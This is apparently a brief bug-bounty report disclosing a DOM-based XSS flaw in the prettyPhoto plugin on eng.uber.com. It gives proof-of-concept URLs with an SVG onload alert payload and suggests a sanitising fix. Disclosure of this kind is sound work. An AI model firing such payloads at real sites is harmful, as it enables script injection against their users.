Hi. found dom xss on this subdomain eng.uber.com. you are using a vulnerable plugin prettyPhotoβ¦
This XSS will work in Firefox,Chrome - Google and IE last version ! And this is very dangerous!
POC
Firefox vector
http://eng.uber.com/#prettyPhoto[i]/x,<svg/onload=alert(document.domain)>/x
POC
Google and IE
http://eng.uber.com/#prettyPhoto[gallery]/1,<a>/
Add screenshot
How to fix the vulnerability,upgrade the plugin or add the filter
hashIndex = parseInt(hashIndex)
hashRel = hashRel.replace(/([ #;&,.+*~':"!^$=>|/])/g,β$1β);